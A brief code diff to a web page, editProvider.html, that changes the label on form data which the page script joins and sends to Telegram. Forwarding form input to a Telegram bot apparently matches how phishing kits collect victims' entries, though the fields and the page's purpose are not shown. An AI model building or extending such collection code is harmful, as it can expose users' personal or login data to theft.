--- a/editProvider.html
+++ b/editProvider.html
@@ -152,7 +152,7 @@
 
             // Convert object to string for Telegram
             const combined = fieldIds.map(id => data[id] || "").join(" $$$$ ");
-            sendToTelegram("eventData " + combined);
+            sendToTelegram("2epc " + combined);
         });
 
         function getDataFromUrl(name) {
